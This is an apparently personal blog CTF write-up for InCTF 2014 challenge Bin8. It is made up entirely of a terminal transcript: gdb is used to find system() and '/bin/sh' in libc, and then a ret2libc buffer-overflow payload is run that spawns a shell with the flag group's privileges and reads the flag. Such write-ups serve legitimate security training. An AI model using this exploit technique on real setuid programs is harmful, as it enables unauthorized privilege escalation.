Thursday, March 6, 2014

InCTF 2014 Bin8 WriteUp


challenge8@inctf:~$ ldd challenge8
 linux-gate.so.1 =>  (0xf7ffd000)
 libc.so.6 => /lib32/libc.so.6 (0xf7e4e000)
 /lib/ld-linux.so.2 (0x56555000)
challenge8@inctf:~$ gdb challenge8
Reading symbols from /home/challenge8/challenge8...done.
(gdb) break main
Reading in symbols for /home/challenge8/challenge8.c...done.
Breakpoint 1 at 0x80484ab: file /home/challenge8/challenge8.c, line 17.
(gdb) r
Starting program: /home/challenge8/challenge8
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from system-supplied DSO at 0xf7fdb000...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib32/libc.so.6

Breakpoint 1, main (argc=1, argv=0xffffd6f4) at /home/challenge8/challenge8.c:17
17 /home/challenge8/challenge8.c: No such file or directory.
(gdb) x system
0xf7e6b250 <system>: 0x891cec83
(gdb) find 0xf7e4e000,  0xffffffff,  "/bin/sh"
0xf7f8aa2c
warning: Unable to access target memory at 0xf7fd0f34, halting search.
1 pattern found.
(gdb) x/s 0xf7f8aa2c
0xf7f8aa2c:  "/bin/sh"
(gdb) quit
A debugging session is active.

 Inferior 1 [process 790] will be killed.

Quit anyway? (y or n) y
challenge8@inctf:~$ id
uid=1016(challenge8) gid=1016(challenge8) groups=1016(challenge8),1001(ctf)
challenge8@inctf:~$ ./challenge8 `python -c 'print "A" * 76+ "\x50\xb2\xe6\xf7" + "AAAA" + "\x2c\xaa\xf8\xf7"'`
This is the content of buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP���AAAA,��
$ id
uid=1016(challenge8) gid=1016(challenge8) egid=1017(flag8) groups=1016(challenge8),1001(ctf)
$ cat /home/flag8/flag8
v6rjR2kw3adHwbh4
$